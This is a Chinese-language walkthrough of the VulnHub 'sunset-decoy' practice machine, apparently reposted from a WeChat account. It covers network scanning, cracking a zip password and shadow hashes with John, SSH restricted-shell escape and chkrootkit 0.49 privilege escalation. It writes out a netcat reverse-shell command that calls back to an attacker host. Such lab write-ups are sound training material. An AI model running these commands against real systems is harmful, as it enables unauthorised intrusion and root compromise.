vulnhub之sunset-decoy的实践

admin 2023年4月17日01:28:56评论18 views字数 988阅读3分17秒阅读模式

今天实践的是vulnhub的sunset-decoy镜像,

下载地址,https://download.vulnhub.com/sunset/decoy.ova,

用virtualbox导入,做地址扫描,

sudo netdiscover -r 192.168.0.0/24,有地址了,190就是,

vulnhub之sunset-decoy的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

vulnhub之sunset-decoy的实践

浏览器访问http://192.168.0.190,

vulnhub之sunset-decoy的实践

下载save.zip,解压发现需要密码,

vulnhub之sunset-decoy的实践

准备破解密码的hash文件,zip2john save.zip > pass.hash,

vulnhub之sunset-decoy的实践

破解,john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash,

vulnhub之sunset-decoy的实践

获取到解压密码,manuel,解压后发现里面有密码hash文件,

vulnhub之sunset-decoy的实践

破解,john --wordlist=/usr/share/wordlists/rockyou.txt etc/shadow,

vulnhub之sunset-decoy的实践

获取到用户名296640a3b825115a47b68fc44501c828的密码server,

ssh登录到靶机,

ssh [email protected] -t "bash --noprofile",

查看日志文件,/bin/cat log.txt,

vulnhub之sunset-decoy的实践

获取到chkrootkit-0.49信息,

vulnhub之sunset-decoy的实践

查找可利用的漏洞,searchsploit chkrootkit,

vulnhub之sunset-decoy的实践

进一步查看利用方法,searchsploit -p 33899,

cat /usr/share/exploitdb/exploits/linux/local/33899.txt,

vulnhub之sunset-decoy的实践

说是让在tmp目录创建个update文件,

vulnhub之sunset-decoy的实践

进入tmp目录,cd /tmp,写个反弹shell脚本,

echo "/usr/bin/nc 192.168.0.189 4444 -e /bin/sh" > update,

给脚本开执行权限,/bin/chmod 777 update,

kali攻击机上用nc开个反弹shell监听,nc -lvp 4444,

回到用户目录下执行honeypot.decoy,选择第5项,病毒扫描,

vulnhub之sunset-decoy的实践

稍等一会儿,反弹shell就过来了,id确认是root,

vulnhub之sunset-decoy的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之sunset-decoy的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月17日01:28:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之sunset-decoy的实践http://cn-sec.com/archives/1673133.html

发表评论

匿名网友 填写信息